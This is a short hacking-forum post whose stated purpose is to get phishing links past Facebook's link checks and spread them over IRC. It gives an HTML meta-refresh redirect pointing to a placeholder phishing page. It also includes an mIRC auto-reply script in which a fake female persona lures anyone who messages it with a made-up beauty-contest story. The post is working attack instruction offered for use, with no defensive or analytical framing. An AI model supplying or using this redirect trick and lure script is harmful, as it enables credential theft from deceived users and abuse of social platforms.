Become King Of Hell

How to post PHISHING links on Facebook & spread it though mIRc

0xLuca

Hellcoins
♆170
Hello, we all know that Facebook has url cache, so you cannot post any link that has a FAKE Facebook page. So here it is...

Do your phishing page and after that make a simple HTML file that redirects to your phishing page, and post that on Facebook.

Code:
<meta HTTP-EQUIV="REFRESH" content="0; url=http://www.YOUR-PHISHING-PAGE.com/MyPhishingPage.html">
Now how to start auto-spread through the mIRC client,
Open the mIRC client and press ALT+R, go to File>New.. and paste this & ok, connect to any IRC server you want with a girl Nick and when someone writes you a message this message will be sent to him automatically, edit the message in whatever you want
Code:
on *:OPEN:?: {
  msg $nick Hey there $nick, I have some exciting news to share with you! I'm currently participating in a beauty contest where I'm competing against other gorgeous girls to see who's the fairest of them all. But, I need your help to win!

All you have to do is head over to my Facebook profile, and you'll find my contest entry. Give it a like, leave a comment telling me what you think, and you'll help me edge out the competition.

If you're interested in seeing more of my photos and getting to know me better, feel free to send me a friend request too. Trust me, you won't regret it! }